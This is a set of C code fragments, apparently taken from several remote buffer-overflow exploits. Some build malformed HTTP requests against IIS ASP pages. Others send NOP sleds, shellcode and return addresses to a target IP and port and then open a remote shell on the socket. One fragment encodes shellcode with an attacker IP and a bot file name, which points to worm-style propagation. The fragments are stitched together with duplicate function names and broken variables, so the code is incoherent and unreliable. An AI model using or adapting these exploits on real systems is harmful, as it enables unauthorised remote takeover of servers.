//* int main() { GetShellcode(); PrintSc(sh_Buff, sh_Len); //void(*code)() = (void *)sh_Buff; //code(); }
int GetOverStr(char *buffer,char *server,char *urlfile,int offset) { char shellcodebuff[BUFFSIZE]; char overbuff[BUFFSIZE]; int i,j; char *url="/iisstart.asp"; char overstr[]="GET %s?!!ko HTTP/1.1\r\nHOST:%s\r\nContent-Type: application/x-www-form-urlencoded%s\r\nContent-length: 2147506431\r\n\r\n"; if(urlfile!=NULL) url=urlfile; memset(shellcodebuff,'7',BUFFSIZE);//NOPCODE,BUFFSIZE); i=getoverbuff(overbuff); j=GetShellcode(shellcodebuff+0x1000); for(j=0;j<=0xe000;j+=4) { strcat(shellcodebuff,"\x41\x41\x41\x41"); } _snprintf(buffer,BUFFSIZE,overstr,url,server,shellcodebuff); j=strlen(buffer); memcpy(buffer+j,overbuff,i); return (j+i); }
int GetOverStr(char *buffer,char *server,char *urlfile,int offset2) { char findshellcodebuff[BUFFSIZE]; char shellcodebuff[BUFFSIZE]; char overbuff[BUFFSIZE]; int i,findshellbytes,postbytes; char *url="/default.asp"; char overstr[]="GET %s%s?koko HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n"; if(urlfile!=NULL) url=urlfile; offset=offset-strlen(url)-4; i=getoverbuff(overbuff); // findshellbytes=GetFindShellcode(findshellcodebuff); postbytes=GetShellcode(shellcodebuff); memcpy(overbuff+0x730,shellcodebuff,postbytes); _snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server); //,i,overbuff); //,shellcodebuff); // strcpy(buffer+strlen(buffer)+1,shellcodebuff); return (strlen(buffer)); //+postbytes+1); }
int main(int argc, char *argv[]) { unsigned char Buff[1024]; unsigned char data; unsigned long *ps; int s, i, k; if (argc < 3) { fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]); return -1; } s = Make_Connection(argv[1], atoi(argv[2]), 10); if (!s) { fprintf(stderr, "[-] Connect failed. \n"); return -1; } GetShellcode(); ps = (unsigned long *)Buff; for(i=0; i<sizeof(Buff)/4; i++) { *(ps++) = 0x60000000; } i = sh_Len % 4; memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len); ps = (unsigned long *)Buff; for(i=0; i<92/4; i++) { *(ps++) = RET; } Buff[sizeof(Buff)] = 0; //PrintSc(Buff, sizeof(Buff)); i = send(s, Buff, sizeof(Buff), 0); if (i <= 0) { fprintf(stderr, "[-] Send failed. \n"); return -1; } data='I'; i = send(s, &data, 1, 1); if (i <= 0) { fprintf(stderr, "[-] Send OOB data failed. \n"); return -1; } sleep (1); shell(s); }
DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename) { DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename); if (RNS0TerminatedShellcodeSize > buffersize) return 0; if (RNS0TerminatedShellcodeSize > 65535) return 0; char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257); DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename); RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize); free(Shellcode); return RNS0TerminatedShellcodeSize; }
int main(int argc, char *argv[]) { unsigned char Buff[1024]; unsigned char data; unsigned long *ps; int s, i; if (argc < 3) { fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]); return -1; } s = Make_Connection(argv[1], atoi(argv[2]), 10); if (!s) { fprintf(stderr, "[-] Connect failed. \n"); return -1; } GetShellcode(); PrintSc(sh_Buff, sh_Len); memset(Buff, 0x90, sizeof(Buff)); strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff); ps = (unsigned long *)Buff; for(i=0; i<128/4; i++) { *(ps++) = RET; } Buff[sizeof(Buff) - 1] = 0; i = send(s, Buff, sizeof(Buff), 0); if (i <= 0) { fprintf(stderr, "[-] Send failed. \n"); return -1; } data='I'; i = send(s, &data, 1, 1); if (i <= 0) { fprintf(stderr, "[-] Send OOB data failed. \n"); return -1; } sleep (1); // get shell use same socket shell(s); }